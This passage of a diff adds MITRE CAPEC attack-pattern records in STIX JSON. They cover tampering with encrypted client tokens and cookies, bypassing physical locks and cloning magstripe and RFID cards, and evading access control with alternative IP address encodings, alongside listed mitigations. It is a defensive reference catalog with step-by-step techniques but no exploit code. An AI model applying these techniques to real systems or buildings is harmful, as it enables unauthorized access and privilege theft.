+ "external_id": "CWE-302", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/302.html" + }, + { + "external_id": "CWE-472", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/472.html" + }, + { + "external_id": "CWE-565", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/565.html" + }, + { + "external_id": "CWE-315", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/315.html" + }, + { + "external_id": "CWE-539", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/539.html" + }, + { + "external_id": "CWE-384", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/384.html" + }, + { + "external_id": "CWE-233", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/233.html" + } + ], + "id": "attack-pattern--9afead03-280c-4f2c-82f6-b08b7a54a8e3", + "modified": "2020-07-30T00:00:00.000Z", + "name": "Manipulating Opaque Client-based Data Tokens", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "attack-pattern", + "x_capec_abstraction": "Standard", + "x_capec_child_of_refs": [ + "attack-pattern--1fa1539d-4a13-4453-bf43-ad0987b2fbf5" + ], + "x_capec_consequences": { + "Access_Control": [ + "Gain Privileges" + ], + "Authorization": [ + "Gain Privileges" + ], + "Confidentiality": [ + "Gain Privileges" + ], + "Integrity": [ + "Modify Data" + ] + }, + "x_capec_domains": [ + "Software" + ], + "x_capec_example_instances": [ + "With certain price watching websites, that aggregate products available prices, the user can buy items through whichever vendors has product availability, the best price, or other differentiator. Once a user selects an item, the site must broker the purchase of that item with the vendor. Because vendors sell the same product through different channel partners at different prices, token exchange between price watching sites and selling vendors will often contain pricing information. With some price watching sites, manipulating URL-data (which is encrypted) even opaquely yields different prices charged by the fulfilling vendor. If the manipulated price turns out higher, the Attacker can cancel purchase. If the Attacker succeeded in manipulating the token and creating a lower price, they proceed.", + "Upon successful authentication user is granted an encrypted authentication cookie by the server and it is stored on the client. One piece of information stored in the authentication cookie reflects the access level of the user (e.g. \"u\" for user). The authentication cookie is encrypted using the Electronic Code Book (ECB) mode, that naively encrypts each of the plaintext blocks to each of the ciphertext blocks separately. An attacker knows the structure of the cookie and can figure out what bits (encrypted) store the information relating to the access level of the user. An attacker modifies the authentication cookie and effectively substitutes \"u\" for \"a\" by flipping some of the corresponding bits of ciphertext (trial and error). Once the correct \"flip\" is found, when the system is accessed, the attacker is granted administrative privileges in the system. Note that in this case an attacker did not have to figure out the exact encryption algorithm or find the secret key, but merely exploit the weakness inherent in using the ECB encryption mode.", + "Archangel Weblog 0.90.02 allows remote attackers to bypass authentication by setting the ba_admin cookie to 1. See also: CVE-2006-0944" + ], + "x_capec_execution_flow": "

Execution Flow

Explore

  1. Enumerate information passed to client side: The attacker identifies the parameters used as part of tokens to take business or security decisions

    2. Techniques
    Use WebScarab to reveal hidden fields while browsing.
    Use a sniffer to capture packets
    View source of web page to find hidden fields
    Examine URL to see if any opaque tokens are in it
    Disassemble or decompile client-side application
    Use debugging tools such as File Monitor, Registry Monitor, Debuggers, etc.

  2. Determine protection mechanism for opaque token: The attacker determines the protection mechanism used to protect the confidentiality and integrity of these data tokens. They may be obfuscated or a full blown encryption may be used.

    3. Techniques
    Look for signs of well-known character encodings
    Look for cryptographic signatures
    Look for delimiters or other indicators of structure

Experiment

  1. Modify parameter/token values: Trying each parameter in turn, the attacker modifies the values

    2. Techniques
    Modify tokens logically
    Modify tokens arithmetically
    Modify tokens bitwise
    Modify structural components of tokens
    Modify order of parameters/tokens

  2. Cycle through values for each parameter.: Depending on the nature of the application, the attacker now cycles through values of each parameter and observes the effects of this modification in the data returned by the server

    3. Techniques
    Use network-level packet injection tools such as netcat
    Use application-level data modification tools such as Tamper Data, WebScarab, TamperIE, etc.
    Use modified client (modified by reverse engineering)
    Use debugging tools to modify data in client
", + "x_capec_likelihood_of_attack": "High", + "x_capec_parent_of_refs": [ + "attack-pattern--cddb7bce-8d94-4eea-8e73-9f6ef66376c2" + ], + "x_capec_prerequisites": [ + "An attacker already has some access to the system or can steal the client based data tokens from another user who has access to the system.", + "For an Attacker to viably execute this attack, some data (later interpreted by the application) must be held client-side in a way that can be manipulated without detection. This means that the data or tokens are not CRCd as part of their value or through a separate meta-data store elsewhere." + ], + "x_capec_resources_required": [ + "The Attacker needs no special hardware-based resources in order to conduct this attack. Software plugins, such as Tamper Data for Firefox, may help in manipulating URL- or cookie-based data." + ], + "x_capec_skills_required": { + "High": "If the client site token is encrypted.", + "Medium": "If the client site token is obfuscated." + }, + "x_capec_status": "Draft", + "x_capec_typical_severity": "Medium", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "One solution to this problem is to protect encrypted data with a CRC of some sort. If knowing who last manipulated the data is important, then using a cryptographic \"message authentication code\" (or hMAC) is prescribed. However, this guidance is not a panacea. In particular, any value created by (and therefore encrypted by) the client, which itself is a \"malicious\" value, all the protective cryptography in the world can't make the value 'correct' again. Put simply, if the client has control over the whole process of generating and encoding the value, then simply protecting its integrity doesn't help.", + "id": "course-of-action--e9607fbe-044b-4d09-8ead-802f3f085108", + "modified": "2020-07-30T00:00:00.000Z", + "name": "coa-39-0", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--67d47bb8-367b-4568-834c-70ed30ce08cc", + "modified": "2020-07-30T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--e9607fbe-044b-4d09-8ead-802f3f085108", + "target_ref": "attack-pattern--9afead03-280c-4f2c-82f6-b08b7a54a8e3", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Make sure to protect client side authentication tokens for confidentiality (encryption) and integrity (signed hash)", + "id": "course-of-action--c9f9e9db-5633-4696-b4dc-e6082a1ccb15", + "modified": "2020-07-30T00:00:00.000Z", + "name": "coa-39-1", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--b6318059-55e6-4b00-9821-0eae3425f8df", + "modified": "2020-07-30T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--c9f9e9db-5633-4696-b4dc-e6082a1ccb15", + "target_ref": "attack-pattern--9afead03-280c-4f2c-82f6-b08b7a54a8e3", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Make sure that all session tokens use a good source of randomness", + "id": "course-of-action--08eae113-ec2a-445c-afca-ffe3b526e605", + "modified": "2020-07-30T00:00:00.000Z", + "name": "coa-39-2", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--38c91dac-0db3-40f7-ab37-2d092382b5ca", + "modified": "2020-07-30T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--08eae113-ec2a-445c-afca-ffe3b526e605", + "target_ref": "attack-pattern--9afead03-280c-4f2c-82f6-b08b7a54a8e3", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Perform validation on the server side to make sure that client side data tokens are consistent with what is expected.", + "id": "course-of-action--85ac4180-1e64-45ea-a569-f9e826426ae8", + "modified": "2020-07-30T00:00:00.000Z", + "name": "coa-39-3", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--2f0a0801-67e1-4043-87bf-b630a49aa8a8", + "modified": "2020-07-30T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--85ac4180-1e64-45ea-a569-f9e826426ae8", + "target_ref": "attack-pattern--9afead03-280c-4f2c-82f6-b08b7a54a8e3", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Facilities often used layered models for physical security such as traditional locks, Electronic-based card entry systems, coupled with physical alarms. Hardware security mechanisms range from the use of computer case and cable locks as well as RFID tags for tracking computer assets. This layered approach makes it difficult for random physical security breaches to go unnoticed, but is less effective at stopping deliberate and carefully planned break-ins. Avoiding detection begins with evading building security and surveillance and methods for bypassing the electronic or physical locks which secure entry points.", + "external_references": [ + { + "external_id": "CAPEC-390", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/390.html" + }, + { + "description": "Stuart McClure, Joel Scambray, George Kurtz, Hacking Exposed: Network Security Secrets & Solutions (6th Edition), 2009, McGraw Hill", + "external_id": "REF-33", + "source_name": "reference_from_CAPEC" + } + ], + "id": "attack-pattern--8ba08815-66fb-4150-a7fa-8ab6d1472b5f", + "modified": "2014-06-23T00:00:00.000Z", + "name": "Bypassing Physical Security", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "attack-pattern", + "x_capec_abstraction": "Meta", + "x_capec_domains": [ + "Physical Security" + ], + "x_capec_parent_of_refs": [ + "attack-pattern--00c93895-c68e-4d27-a1ec-0dddce68ed97", + "attack-pattern--5e808864-44b1-478c-8cb0-75c55cd51e2b" + ], + "x_capec_status": "Draft", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "An attacker uses techniques and methods to bypass physical security measures of a building or facility. Physical locks may range from traditional lock and key mechanisms, cable locks used to secure laptops or servers, locks on server cases, or other such devices. Techniques such as lock bumping, lock forcing via snap guns, or lock picking can be employed to bypass those locks and gain access to the facilities or devices they protect, although stealth, evidence of tampering, and the integrity of the lock following an attack, are considerations that may determine the method employed. Physical locks are limited by the complexity of the locking mechanism. While some locks may offer protections such as shock resistant foam to prevent bumping or lock forcing methods, many commonly employed locks offer no such countermeasures.", + "external_references": [ + { + "external_id": "CAPEC-391", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/391.html" + }, + { + "description": "Stuart McClure, Joel Scambray, George Kurtz, Hacking Exposed: Network Security Secrets & Solutions (6th Edition), 2009, McGraw Hill", + "external_id": "REF-33", + "source_name": "reference_from_CAPEC" + } + ], + "id": "attack-pattern--00c93895-c68e-4d27-a1ec-0dddce68ed97", + "modified": "2019-09-30T00:00:00.000Z", + "name": "Bypassing Physical Locks", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "attack-pattern", + "x_capec_abstraction": "Standard", + "x_capec_child_of_refs": [ + "attack-pattern--8ba08815-66fb-4150-a7fa-8ab6d1472b5f" + ], + "x_capec_domains": [ + "Physical Security" + ], + "x_capec_parent_of_refs": [ + "attack-pattern--4068bee0-b331-49e8-872e-98429a3c374a", + "attack-pattern--9996317e-313b-456c-8bc8-491dbb53b368", + "attack-pattern--aea87f07-9619-4bc5-9790-01bf3423c494" + ], + "x_capec_status": "Draft", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "An attacker uses a bump key to force a lock on a building or facility and gain entry. Lock Bumping is the use of a special type of key that can be tapped or bumped to cause the pins within the lock to fall into temporary alignment, allowing the lock to be opened. Lock bumping allows an attacker to open a lock without having the correct key. A standard lock is secured by a set of internal pins that prevent the device from turning. Spring loaded driver pins push down on the key pins. When the correct key is inserted, the ridges on the key push the key pins up and against the driver pins, causing correct alignment which allows the lock cylinder to rotate. A bump key is a specially constructed key that exploits this design. When the bump key is struck or firmly tapped, its teeth transfer the force of the tap into the key pins, causing the lock to momentarily shift into proper alignment for the mechanism to be opened.", + "external_references": [ + { + "external_id": "CAPEC-392", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/392.html" + }, + { + "description": "Stuart McClure, Joel Scambray, George Kurtz, Hacking Exposed: Network Security Secrets & Solutions (6th Edition), 2009, McGraw Hill", + "external_id": "REF-33", + "source_name": "reference_from_CAPEC" + } + ], + "id": "attack-pattern--4068bee0-b331-49e8-872e-98429a3c374a", + "modified": "2019-09-30T00:00:00.000Z", + "name": "Lock Bumping", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "attack-pattern", + "x_capec_abstraction": "Detailed", + "x_capec_child_of_refs": [ + "attack-pattern--00c93895-c68e-4d27-a1ec-0dddce68ed97" + ], + "x_capec_domains": [ + "Physical Security" + ], + "x_capec_status": "Draft", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "An attacker uses lock picking tools and techniques to bypass the locks on a building or facility. Lock picking is the use of a special set of tools to manipulate the pins within a lock. Different sets of tools are required for each type of lock. Lock picking attacks have the advantage of being non-invasive in that if performed correctly the lock will not be damaged. A standard lock pin-and-tumbler lock is secured by a set of internal pins that prevent the tumbler device from turning. Spring loaded driver pins push down on the key pins preventing rotation so that the bolt remains in a locked position.. When the correct key is inserted, the ridges on the key push the key pins up and against the driver pins, causing correct alignment which allows the lock cylinder to rotate. Most common locks, such as domestic locks in the US, can be picked using a standard 2 tools (i.e. a torsion wrench and a hook pick).", + "external_references": [ + { + "external_id": "CAPEC-393", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/393.html" + }, + { + "description": "Stuart McClure, Joel Scambray, George Kurtz, Hacking Exposed: Network Security Secrets & Solutions (6th Edition), 2009, McGraw Hill", + "external_id": "REF-33", + "source_name": "reference_from_CAPEC" + } + ], + "id": "attack-pattern--9996317e-313b-456c-8bc8-491dbb53b368", + "modified": "2019-09-30T00:00:00.000Z", + "name": "Lock Picking", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "attack-pattern", + "x_capec_abstraction": "Detailed", + "x_capec_child_of_refs": [ + "attack-pattern--00c93895-c68e-4d27-a1ec-0dddce68ed97" + ], + "x_capec_domains": [ + "Physical Security" + ], + "x_capec_status": "Draft", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "An attacker uses a Snap Gun, also known as a Pick Gun, to force the lock on a building or facility. A Pick Gun is a special type of lock picking instrument that works on similar principles as lock bumping. A snap gun is a hand-held device with an attached metal pick. The metal pick strikes the pins within the lock, transferring motion from the key pins to the driver pins and forcing the lock into momentary alignment. A standard lock is secured by a set of internal pins that prevent the device from turning. Spring loaded driver pins push down on the key pins. When the correct key is inserted, the ridges on the key push the key pins up and against the driver pins, causing correct alignment which allows the lock cylinder to rotate. A Snap Gun exploits this design by using a metal pin to strike all of the key pins at once, forcing the driver pins to shift into an unlocked position. Unlike bump keys or lock picks, a Snap Gun may damage the lock more easily, leaving evidence that the lock has been tampered with.", + "external_references": [ + { + "external_id": "CAPEC-394", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/394.html" + }, + { + "description": "Stuart McClure, Joel Scambray, George Kurtz, Hacking Exposed: Network Security Secrets & Solutions (6th Edition), 2009, McGraw Hill", + "external_id": "REF-33", + "source_name": "reference_from_CAPEC" + } + ], + "id": "attack-pattern--aea87f07-9619-4bc5-9790-01bf3423c494", + "modified": "2019-09-30T00:00:00.000Z", + "name": "Using a Snap Gun Lock to Force a Lock", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "attack-pattern", + "x_capec_abstraction": "Detailed", + "x_capec_child_of_refs": [ + "attack-pattern--00c93895-c68e-4d27-a1ec-0dddce68ed97" + ], + "x_capec_domains": [ + "Physical Security" + ], + "x_capec_status": "Draft", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "An attacker exploits security assumptions to bypass electronic locks or other forms of access controls. Most attacks against electronic access controls follow similar methods but utilize different tools. Some electronic locks utilize magnetic strip cards, others employ RFID tags embedded within a card or badge, or may involve more sophisticated protections such as voice-print, thumb-print, or retinal biometrics. Magnetic Strip and RFID technologies are the most widespread because they are cost effective to deploy and more easily integrated with other electronic security measures. These technologies share common weaknesses that an attacker can exploit to gain access to a facility protected by the mechanisms via copying legitimate cards or badges, or generating new cards using reverse-engineered algorithms.", + "external_references": [ + { + "external_id": "CAPEC-395", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/395.html" + }, + { + "description": "Stuart McClure, Joel Scambray, George Kurtz, Hacking Exposed: Network Security Secrets & Solutions (6th Edition), 2009, McGraw Hill", + "external_id": "REF-33", + "source_name": "reference_from_CAPEC" + } + ], + "id": "attack-pattern--5e808864-44b1-478c-8cb0-75c55cd51e2b", + "modified": "2014-06-23T00:00:00.000Z", + "name": "Bypassing Electronic Locks and Access Controls", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "attack-pattern", + "x_capec_abstraction": "Standard", + "x_capec_child_of_refs": [ + "attack-pattern--8ba08815-66fb-4150-a7fa-8ab6d1472b5f" + ], + "x_capec_domains": [ + "Physical Security" + ], + "x_capec_parent_of_refs": [ + "attack-pattern--19015961-475c-438b-887b-e3d66a9143de", + "attack-pattern--65737f80-588a-449a-af08-0508486d9481", + "attack-pattern--ca237733-be3e-4d9c-85a0-d18cb1c8295d", + "attack-pattern--309b5fec-8a59-4d28-8a1c-427d289aad93", + "attack-pattern--0fda524b-2218-4aec-bf3e-6f345d13e459" + ], + "x_capec_status": "Draft", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "This attack pattern has been deprecated as it a generalization of CAPEC-397: Cloning Magnetic Strip Cards, CAPEC-398: Magnetic Strip Card Brute Force Attacks, CAPEC-399: Cloning RFID Cards or Chips and CAPEC-400: RFID Chip Deactivation or Destruction. Please refer to these CAPECs going forward.", + "external_references": [ + { + "external_id": "CAPEC-396", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/396.html" + } + ], + "id": "attack-pattern--631dcf7a-d23f-45b3-b72a-ebd5a3625aeb", + "modified": "2019-09-30T00:00:00.000Z", + "name": "DEPRECATED: Bypassing Card or Badge-Based Systems", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "attack-pattern", + "x_capec_abstraction": "Standard", + "x_capec_status": "Deprecated", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "An attacker duplicates the data on a Magnetic strip card (i.e. 'swipe card' or 'magstripe') to gain unauthorized access to a physical location or a person's private information. Magstripe cards encode data on a band of iron-based magnetic particles arrayed in a stripe along a rectangular card. Most magstripe card data formats conform to ISO standards 7810, 7811, 7813, 8583, and 4909. The primary advantage of magstripe technology is ease of encoding and portability, but this also renders magnetic strip cards susceptible to unauthorized duplication. If magstripe cards are used for access control, all an attacker need do is obtain a valid card long enough to make a copy of the card and then return the card to its location (i.e. a co-worker's desk). Magstripe reader/writers are widely available as well as software for analyzing data encoded on the cards. By swiping a valid card, it becomes trivial to make any number of duplicates that function as the original.", + "external_references": [ + { + "external_id": "CAPEC-397", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/397.html" + }, + { + "description": "Stuart McClure, Joel Scambray, George Kurtz, Hacking Exposed: Network Security Secrets & Solutions (6th Edition), 2009, McGraw Hill", + "external_id": "REF-33", + "source_name": "reference_from_CAPEC" + } + ], + "id": "attack-pattern--19015961-475c-438b-887b-e3d66a9143de", + "modified": "2019-09-30T00:00:00.000Z", + "name": "Cloning Magnetic Strip Cards", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "attack-pattern", + "x_capec_abstraction": "Detailed", + "x_capec_child_of_refs": [ + "attack-pattern--5e808864-44b1-478c-8cb0-75c55cd51e2b" + ], + "x_capec_domains": [ + "Physical Security" + ], + "x_capec_status": "Draft", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "An adversary analyzes the data on two or more magnetic strip cards and is able to generate new cards containing valid sequences that allow unauthorized access and/or impersonation of individuals.", + "external_references": [ + { + "external_id": "CAPEC-398", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/398.html" + }, + { + "description": "Stuart McClure, Joel Scambray, George Kurtz, Hacking Exposed: Network Security Secrets & Solutions (6th Edition), 2009, McGraw Hill", + "external_id": "REF-33", + "source_name": "reference_from_CAPEC" + } + ], + "id": "attack-pattern--65737f80-588a-449a-af08-0508486d9481", + "modified": "2022-02-22T00:00:00.000Z", + "name": "Magnetic Strip Card Brute Force Attacks", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "attack-pattern", + "x_capec_abstraction": "Detailed", + "x_capec_child_of_refs": [ + "attack-pattern--5e808864-44b1-478c-8cb0-75c55cd51e2b" + ], + "x_capec_domains": [ + "Physical Security" + ], + "x_capec_extended_description": "\n Often, magnetic strip encoding methods follow a common format for a given system laid out in up to three tracks. A single card may allow access to a corporate office complex shared by multiple companies. By analyzing how the data is stored on a card, it is also possible to create valid cards via brute-force attacks.\n For example, a single card can grant access to a building, a floor, and a suite number. Reading and analyzing data on multiple cards, then performing a difference analysis between data encoded on three different cards, can reveal clues as to how to generate valid cards that grant access to restricted areas of a building or suites/rooms within that building. Data stored on magstripe cards is often unencrypted, therefore comparing which data changes when two or more cards are analyzed can yield results that aid in determining the structure of the card data. A trivial example would be a common system data format on a data track which binary encodes the suite number of a building that a card will open. By creating multiple cards with differing binary encoded segments it becomes possible to enter unauthorized areas or pass through checkpoints giving the electronic ID of other persons.\n ", + "x_capec_prerequisites": [ + "The ability to calculate a card checksum and write out a valid checksum value. Some cards are protected by a checksum calculation, therefore it is necessary to determine what algorithm is being used to calculate the checksum and to employ that algorithm to calculate and write a new valid checksum for the card being created." + ], + "x_capec_status": "Draft", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "An attacker analyzes data returned by an RFID chip and uses this information to duplicate a RFID signal that responds identically to the target chip. In some cases RFID chips are used for building access control, employee identification, or as markers on products being delivered along a supply chain. Some organizations also embed RFID tags inside computer assets to trigger alarms if they are removed from particular rooms, zones, or buildings. Similar to Magnetic strip cards, RFID cards are susceptible to duplication (cloning) and reuse.", + "external_references": [ + { + "external_id": "CAPEC-399", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/399.html" + }, + { + "description": "Stuart McClure, Joel Scambray, George Kurtz, Hacking Exposed: Network Security Secrets & Solutions (6th Edition), 2009, McGraw Hill", + "external_id": "REF-33", + "source_name": "reference_from_CAPEC" + } + ], + "id": "attack-pattern--ca237733-be3e-4d9c-85a0-d18cb1c8295d", + "modified": "2022-02-22T00:00:00.000Z", + "name": "Cloning RFID Cards or Chips", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "attack-pattern", + "x_capec_abstraction": "Detailed", + "x_capec_child_of_refs": [ + "attack-pattern--5e808864-44b1-478c-8cb0-75c55cd51e2b" + ], + "x_capec_domains": [ + "Physical Security" + ], + "x_capec_extended_description": "\n RFID (Radio Frequency Identification) are passive devices which consist of an integrated circuit for processing RF signals and an antenna. RFID devices are passive in that they lack an on on-board power source. The majority of RFID chips operate on either the 13.56 MHz or 135 KHz frequency. The chip is powered when a signal is received by the antenna on the chip, powering the chip long enough to send a reply message. An attacker is able to capture and analyze RFID data by either stimulating the chip to respond or being proximate to the chip when it sends a response to a remote transmitter. This allows the attacker to duplicate the signal and conduct attacks such as gaining unauthorized access to a building or impersonating a user's identification.\n ", + "x_capec_status": "Draft", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "This attack relies on the adversary using unexpected formats for representing IP addresses. Networked applications may expect network location information in a specific format, such as fully qualified domains names (FQDNs), URL, IP address, or IP Address ranges. If the location information is not validated against a variety of different possible encodings and formats, the adversary can use an alternate format to bypass application access control.", + "external_references": [ + { + "external_id": "CAPEC-4", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/4.html" + }, + { + "external_id": "CWE-291", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/291.html" + }, + { + "external_id": "CWE-173", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/173.html" + }, + { + "description": "G. Hoglund, G. McGraw, Exploiting Software: How to Break Code, 2004--02, Addison-Wesley", + "external_id": "REF-1", + "source_name": "reference_from_CAPEC" + } + ], + "id": "attack-pattern--00d91a4c-2645-4bf1-8db7-e7448ef25f17", + "modified": "2022-02-22T00:00:00.000Z", + "name": "Using Alternative IP Address Encodings", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "attack-pattern", + "x_capec_abstraction": "Detailed", + "x_capec_child_of_refs": [ + "attack-pattern--a1af7c24-25cb-46e5-a27b-ed316e1f91ce" + ], + "x_capec_consequences": { + "Access_Control": [ + "Gain Privileges" + ], + "Authorization": [ + "Gain Privileges" + ], + "Confidentiality": [ + "Gain Privileges" + ] + }, + "x_capec_domains": [ + "Software" + ], + "x_capec_example_instances": [ + "An adversary identifies an application server that applies a security policy based on the domain and application name. For example, the access control policy covers authentication and authorization for anyone accessing http://example.domain:8080/application. However, by using the IP address of the host instead (http://192.168.0.1:8080/application), the application authentication and authorization controls may be bypassed. The adversary relies on the victim applying policy to the namespace abstraction and not having a default deny policy in place to manage exceptions." + ], + "x_capec_execution_flow": "

Execution Flow

Explore

  1. Survey the application for IP addresses as user input: Using a browser, an automated tool or by inspecting the application, an adversary records all entry points to the application where IP addresses are used.

    2. Techniques
    Use a spidering tool to follow and record all links and analyze the web pages to find entry points. Make special note of any links that include parameters in the URL.
    Use a proxy tool to record all user input entry points visited during a manual traversal of the web application.
    Use a browser to manually explore the website and analyze how it is constructed. Many browsers' plugins are available to facilitate the analysis or automate the discovery.
    Manually inspect the application to find entry points.

Experiment

  1. Probe entry points to locate vulnerabilities: The adversary uses the entry points gathered in the \"Explore\" phase as a target list and attempts alternate IP address encodings, observing application behavior. The adversary will also attempt to access the application through an alternate IP address encoding to see if access control changes

    2. Techniques
    Instead of using a URL, use the IP address that the URL resolves to
    Specify a port directly to a URL input
    Omit or add \"http://\" or \"https://\" to a URL to see if the application behaves differently

Exploit

  1. Bypass access control: Using an alternate IP address encoding, the adversary will either access the application or give the alternate encoding as input, bypassing access control restrictions.

", + "x_capec_likelihood_of_attack": "Medium", + "x_capec_prerequisites": [ + "The target software must fail to anticipate all of the possible valid encodings of an IP/web address.", + "The adversary must have the ability to communicate with the server." + ], + "x_capec_resources_required": [ + "The adversary needs to have knowledge of an alternative IP address encoding that bypasses the access control policy of an application. Alternatively, the adversary can simply try to brute-force various encoding possibilities." + ], + "x_capec_skills_required": { + "Low": "The adversary has only to try IP address format combinations." + }, + "x_capec_status": "Draft", + "x_capec_typical_severity": "High", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Design: Default deny access control policies", + "id": "course-of-action--f365abec-a16c-48a7-ae51-bdc687d899bb", + "modified": "2022-02-22T00:00:00.000Z", + "name": "coa-4-0", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "course-of-action", + "x_capec_version": 